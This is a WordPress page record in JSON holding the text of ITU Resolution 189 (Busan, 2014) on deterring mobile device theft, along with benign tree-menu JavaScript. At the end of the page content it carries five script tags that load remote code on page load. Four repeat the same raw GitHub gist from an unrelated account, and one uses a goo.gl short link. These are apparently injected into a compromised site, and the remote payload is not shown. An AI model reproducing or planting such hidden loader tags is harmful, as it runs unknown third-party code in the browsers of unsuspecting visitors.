{"id":1722,"date":"2015-06-30T15:05:43","date_gmt":"2015-06-30T19:05:43","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=1722"},"modified":"2015-06-30T15:05:43","modified_gmt":"2015-06-30T19:05:43","slug":"pp-2014_189","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/plenipotentiary\/pp-2014\/pp-2014_189\/","title":{"rendered":"PP Resolution 189"},"content":{"rendered":"<p><style type=\"text\/css\">\nbody {}\n\n:link { color: #0000ff; text-decoration:none;}\n:visited { color: #6666ff; text-decoration:none; }\na:active { color: #0000ff; text-decoration:none;}\na:hover {color: #0000ff; text-decoration:underline; }\n\ndiv.basetext {}\n\ndiv.basetop {}\n\nh1 {\n    text-align:center;\n}\n\nspan.h2 {}\n\ndiv.year {}\n\ndiv.form {}\n\nspan.cpt {}\n\nspan.cm {}\n\n.fl {}\n\nul {}\n\nli {}\n\nul li {\n\tlist-style:square;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n\nli.basic {\n\tlist-style:square;\n\tlist-style-image:none;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\nspan.links {\n}\n\n\n\n\n.sub { display: none; }\n.subexp {display: block; }\n.sub { display: none; } \n\n.subexp {display: block; } \n\nli.exp {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.col {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.exp_active {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;  \n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer;\n}\n\nli.col_active {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer; \/* if not included, bullets are not shown right in moz*\/\n}\n\n\nli.basic_active {\n  list-style:square;\n  list-style-image:none;\n  background-color:#eeeeff;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\n\/* the 'boxed' and 'attributes' styles are used to display notes and attributes\n*\/\n\n.boxed,.nodecontent {display:inline;}\n.boxed .note-and-attributes {display:none;}\n\n.boxed:hover .note-and-attributes {\n\tposition:fixed; top:2em;right:10px;z-index:3;\n\tdisplay:block;\n\tmin-width:33%;\n\tmax-width:60%;\n\tmax-height:95%;\n\tcolor:black;\n\tbackground:#ffffff;\n\tfont:normal 16px courier, sans-serif;\n\tborder:1px solid black;\n\tpadding:10px;\n}\n\n.note:before {\n\tcontent:\"NOTE: \";\n\tfont-weight:bold;\n}\n\ntable.attributes {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable.attributes td,th {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\ntable.attributes th {\n\ttext-align:center;\n}\ntable.attributes caption {\n\tmargin-top:1em;\n\tfont-style:italic;\n\ttext-align:center;\n}\n\/* Thanks to wolfgangradke, https:\/\/sourceforge.net\/forum\/message.php?msg_id=5991663 *\/\ndiv.nodecontent > p {\n\tmargin-top:0pt;\n\tmargin-bottom:0pt;\n\tdisplay:inline;\n}\n\np + p { \n \tmargin-top: 0.5em !important;\n\tdisplay:block !important;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747128&group_id=7118*\/\ntable {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable td {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747000&group_id=7118*\/\nol {\n\tmargin-top:1px;\n    margin-bottom:1px;\n\tmargin-left:0px;\n\tpadding-left:3%;\n}\n\nol li {\n\tlist-style:decimal;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n<\/style><br \/>\n<script type=\"text\/javascript\">\r\n\/* MarkTree JavaScript code\r\n * \r\n * Distributed under the terms of the MIT License.\r\n * See \"LICENCE.MIT\" or http:\/\/www.opensource.org\/licenses\/mit-license.php for details.\r\n *\r\n * Software distributed under the License is distributed on an \"AS IS\" basis,\r\n * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\r\n * for the specific language governing rights and limitations under the\r\n * License.\r\n * \r\n * Miika Nurminen, 12.7.2004.\r\n *\/\r\n\r\n\/* cross-browser (tested with ie5, mozilla 1 and opera 5) keypress detection *\/\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u2030vi\u2030 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/script><\/p>\n<h3><span style=\"\">PP RESOLUTION 189 (Busan, 2014)<\/span><\/h3>\n<h4><span style=\"\">Assisting Member States to combat and deter mobile device theft<\/span><\/h4>\n<p><span style=\"\">The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\">\n<div class=\"nodecontent\">considering<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that the positive impact of mobile telecommunications, technological progress and the great coverage and development generated by all related services have made the increasing penetration of mobile devices, including smartphones, possible because of the multiple benefits provided;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that the widespread use of mobile telecommunications in the world has also been accompanied by a rise in the problem of mobile device theft;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that the act of mobile device theft can sometimes have a negative impact on the health and safety of citizens and on their sense of security;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        that problems that occur around the crimes related to mobile device theft have become a worldwide issue, since these stolen devices are often very easily resold on the international markets;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        that the illicit trading of stolen mobile devices constitutes a risk to consumers and causes loss of revenue for the industry;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)        that some governments as well as industry have implemented regulations, law-enforcement actions, policies and technological mechanisms to prevent and combat mobile device theft;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g)        that ITU can assist all members in the use of relevant ITU recommendations and play a positive role by offering all interested parties a platform for encouraging discussions, the exchange of best practices, industry cooperation to define technical guidelines and the dissemination of information on combating mobile device theft;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h)        that some manufacturers of mobile devices, as well as operators, offer solutions for consumers, such as free anti-theft applications, with the aim of reducing the rate of mobile device theft,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">concerned<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">that the rate of mobile device theft in various regions of the world remains high, despite efforts made in recent years,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">aware<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">that manufacturers, operators and industry associations have been developing different technological solutions and governments have been developing policies to address this global problem,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">resolves<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">to explore all ways and means to combat and deter mobile device theft,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Director of the Development Bureau, in coordination with the Director of the Radiocommunication Bureau and the Director of the Telecommunication Standardization Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to compile information on best practices developed by industry or governments in combating mobile device theft;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to consult with the relevant ITU Radiocommunication Sector and ITU Telecommunication Standardization Sector study groups, manufacturers of mobile devices, manufacturers of telecommunication network components, operators and other telecommunication standards-development organizations related to these matters, such as GSMA and 3GPP, in order to identify existing and future technological measures, both software and hardware, to mitigate the use of stolen mobile devices;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to provide assistance, within the Union&#8217;s expertise, and within available resources, as appropriate, in cooperation with relevant organizations, to Member States, if so requested, in order to reduce mobile device theft and the use of stolen mobile devices in their countries,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Secretary-General<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">to report annually to the Council on progress of the work,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">invites Member States and Sector Members<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">to contribute to the studies in this area.<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PP RESOLUTION 189 (Busan, 2014) Assisting Member States to combat and deter mobile device theft The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014), considering a) that the positive impact of mobile telecommunications, technological progress and the great coverage and development generated by all related services have made the increasing penetration of mobile [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1668,"menu_order":189,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1722","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1722","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=1722"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1722\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1668"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=1722"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}